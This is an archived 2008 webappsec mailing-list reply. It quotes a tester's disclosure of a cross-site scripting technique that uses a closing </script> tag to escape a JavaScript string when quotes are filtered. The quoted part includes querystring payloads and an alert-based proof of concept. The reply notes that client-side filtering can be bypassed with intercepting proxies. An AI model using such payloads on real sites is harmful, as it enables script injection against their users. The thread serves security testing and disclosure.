Re: Script Tag Breakout

From: Taufiq Ali <taufiq.ali_at_nospam>
Date: Tue Oct 21 2008 - 05:40:59 GMT
To: Nick Von Dadelszen <nvondad@gmail.com>

Hey Nick,

This is is very much there & there lot of grease monkey (Firefox addon) scripts that do the same. However if the website uses javascript for getting rid of the meta characters then its poor design as this can very much be bypasses using a application proxies like paros, webscrab, burp suite etc. So once the script verifies the code they can be then captured in above mentioned proxies & manipulated. What you just mentioned will work with websites that use javascript to filter out their meta characters.

Taufiq

Original Message -------- Subject: Script Tag Breakout From: Nick Von Dadelszen <nvondad@gmail.com> To: webappsec@securityfocus.com Date: 10/20/2008 7:04 AM

> ey all,
>
> Not sure if this is a known issue or not but thought I would share.
> Its not a common situation to occur but I've used it a couple of times
> in the last couple of years while testing apps.
>
> -- Description --
> Able to break out of a string variable without using quotes through
> the use of a </script> tag.
>
> For example, if the code of a page does the following:
> <script>
> somestring = "[your querystring here]";
> </script>
>
> You would normally break out of this with the following
> querystring=";[code here]
>
> If the code checks for a double or single quote and removes it, you
> cannot normally break out of this code. However, you are able to
> close the current script tag, even from within a string variable. So,
> the following two breakouts work:
> querystring=</script>[HTML here]
> querystring=</script><script>[javascript here]</script>
>
> The resulting code looks something like the following:
> <html>
> <body>
> <h1>Script Tag Breakout PoC</h1>
> <script>
> string = "</script><h1>Parsed HTML Code Here</h1><!--";
> </script>
> </body>
> </html>
>
> Or:
> <html>
> <body>
> <h1>Script Tag Breakout PoC</h1>
> <script>
> string = "</script><script>alert(document.location);</script>";
> </script>
> </body>
> </html>
>
> In the above HTML, the javascript alert function is called regardless
> of it being contained within a string variable.
>
> -- Tested Browsers --
> All version of IE and Firefox up to and including IE 7 and firefox 3.
>
> ---------------------------------------------------------
> Nick von Dadelszen
> Lateral Security
> www.lateralsecurity.com
> ---------------------------------------------------------
>
> -------------------------------------------------------------------------
> Sponsored by: Watchfire
> Methodologies & Tools for Web Application Security Assessment
> With the rapid rise in the number and types of security threats, web application security assessments should be considered a crucial phase in the development of any web application. What methodology should be followed? What tools can accelerate the assessment process? Download this Whitepaper today!
>
> https://www.watchfire.com/securearea/whitepapers.aspx?id=70170000000940F
> -------------------------------------------------------------------------
>
>

Sponsored by: Watchfire
Methodologies & Tools for Web Application Security Assessment With the rapid rise in the number and types of security threats, web application security assessments should be considered a crucial phase in the development of any web application. What methodology should be followed? What tools can accelerate the assessment process? Download this Whitepaper today!

https://www.watchfire.com/securearea/whitepapers.aspx?id=70170000000940F

This message: [ Message body ]
Next message: Auri Rahimzadeh: "RE: Script Tag Breakout"
Previous message: Calderon, Juan Carlos (GE, Corporate, consultant): "Classic ASP security course at OWASP summit"
In reply to: Nick Von Dadelszen: "Script Tag Breakout"
Next in thread: Auri Rahimzadeh: "RE: Script Tag Breakout"
Reply: Auri Rahimzadeh: "RE: Script Tag Breakout"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ]